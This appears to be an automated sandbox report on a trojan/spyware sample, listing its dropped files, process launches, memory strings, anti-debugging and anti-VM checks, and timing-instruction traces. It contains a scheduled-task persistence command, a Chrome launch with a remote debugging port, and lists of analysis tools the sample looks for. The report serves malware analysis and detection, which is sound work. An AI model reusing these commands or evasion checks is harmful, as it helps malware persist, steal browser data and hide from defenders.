Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725362825.0000350C00C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725362825.0000350C00C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725018900.0000350C00B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723951044.0000350C007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724054797.0000350C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723951044.0000350C007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724054797.0000350C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000003.00000002.1731609770.000079FC00238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724054797.0000350C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000003.00000003.1694429392.000079FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1694653197.000079FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1734234156.000079FC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000003.00000003.1694429392.000079FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1694653197.000079FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1734234156.000079FC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000002.1731609770.000079FC00238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardy
Source: chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000003.1711515322.0000350C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711289916.0000350C00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711661748.0000350C01264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C859C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C859C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C859D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C859D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C859E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 9_2_6C859E27

System Summary

Source: C:\Users\user\Desktop\u25XzKsRuY.exe File dump: service123.exe.0.dr 314617856
Source: u25XzKsRuY.exe Static PE information: section name:
Source: u25XzKsRuY.exe Static PE information: section name: .idata
Source: u25XzKsRuY.exe Static PE information: section name:
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 588990BA03C40D8FA04671C882E1BF46773A14AC6AA8E15A556FFEBC18D82EEA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C913560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C915980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C913820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C915A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C9136E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C913B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C90ADB0 appears 49 times
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7996 -s 1236
Source: u25XzKsRuY.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: u25XzKsRuY.exe Static PE information: Section: syhqkjwe ZLIB complexity 0.9944963005250288
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/7@16/5
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:892:120:WilError_03
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7996
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: chrome.exe, 00000003.00000002.1722908239.0000350C00535000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: u25XzKsRuY.exe Virustotal: Detection: 54%
Source: u25XzKsRuY.exe ReversingLabs: Detection: 63%
Source: unknown Process created: C:\Users\user\Desktop\u25XzKsRuY.exe "C:\Users\user\Desktop\u25XzKsRuY.exe"
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2132,i,4658029953640130748,9299250250525862020,262144 /prefetch:8
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7996 -s 1236
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: u25XzKsRuY.exe Static file information: File size 4429824 > 1048576
Source: u25XzKsRuY.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: u25XzKsRuY.exe Static PE information: Raw size of syhqkjwe is bigger than: 0x100000 < 0x1b2800
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00208230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00208230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: u25XzKsRuY.exe Static PE information: real checksum: 0x44957c should be: 0x444461
Source: u25XzKsRuY.exe Static PE information: section name:
Source: u25XzKsRuY.exe Static PE information: section name: .idata
Source: u25XzKsRuY.exe Static PE information: section name:
Source: u25XzKsRuY.exe Static PE information: section name: syhqkjwe
Source: u25XzKsRuY.exe Static PE information: section name: kcefumhe
Source: u25XzKsRuY.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0020A521 push es; iretd 9_2_0020A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8F0C30 push eax; mov dword ptr [esp], edi 9_2_6C8F0DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8BED10 push eax; mov dword ptr [esp], ebx 9_2_6C8BEE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C894E31 push eax; mov dword ptr [esp], ebx 9_2_6C894E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C888E7A push edx; mov dword ptr [esp], ebx 9_2_6C888E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88A947 push eax; mov dword ptr [esp], ebx 9_2_6C88A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C892AAC push edx; mov dword ptr [esp], ebx 9_2_6C892AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8A8AA0 push eax; mov dword ptr [esp], ebx 9_2_6C8A909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C890AA2 push eax; mov dword ptr [esp], ebx 9_2_6C890AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8BEAB0 push eax; mov dword ptr [esp], ebx 9_2_6C8BEBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C2BF0 push eax; mov dword ptr [esp], ebx 9_2_6C8C2F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C2BF0 push edx; mov dword ptr [esp], ebx 9_2_6C8C2F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88048B push eax; mov dword ptr [esp], ebx 9_2_6C8804A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8804E0 push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C888435 push edx; mov dword ptr [esp], ebx 9_2_6C888449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8A8460 push eax; mov dword ptr [esp], ebx 9_2_6C8A8A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88A5A7 push eax; mov dword ptr [esp], ebx 9_2_6C88A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C861CFA push eax; mov dword ptr [esp], ebx 9_2_6C916622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8986A1 push 890005EAh; ret 9_2_6C8986A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8806A2 push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8806A6 push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8D06B0 push eax; mov dword ptr [esp], ebx 9_2_6C8D0A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8806FD push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8866F3 push edx; mov dword ptr [esp], ebx 9_2_6C886707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C2620 push eax; mov dword ptr [esp], ebx 9_2_6C8C2954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C2620 push edx; mov dword ptr [esp], ebx 9_2_6C8C2973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88070E push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88A777 push eax; mov dword ptr [esp], ebx 9_2_6C88A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C85E0D0 push eax; mov dword ptr [esp], ebx 9_2_6C916AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C85E0D0 push edx; mov dword ptr [esp], edi 9_2_6C916B36
Source: u25XzKsRuY.exe Static PE information: section name: syhqkjwe entropy: 7.955673958083564
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1362EBE second address: 1362EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1363094 second address: 136309A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136309A second address: 13630AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64821h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1363832 second address: 1363842 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF6D0B95BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1365168 second address: 13651E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF6D0B64818h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D2386h] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FF6D0B64818h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov edi, ecx 0x0000004b mov si, B5CFh 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+122D279Ah] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jno 00007FF6D0B64816h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13651E8 second address: 13651EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13667BE second address: 13667C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1366548 second address: 1366569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF6D0B95BE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13667C2 second address: 13667EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push esi 0x0000000b mov dword ptr [ebp+1244B1E0h], esi 0x00000011 pop edi 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 jc 00007FF6D0B6481Ch 0x0000001d xor dword ptr [ebp+1246B51Dh], esi 0x00000023 popad 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13667EE second address: 13667F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1367210 second address: 1367216 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1367216 second address: 1367231 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF6D0B95BECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jo 00007FF6D0B95BE6h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1367CF4 second address: 1367D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64820h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136D195 second address: 136D19F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF6D0B95BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1367AE0 second address: 1367AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1369097 second address: 136909B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
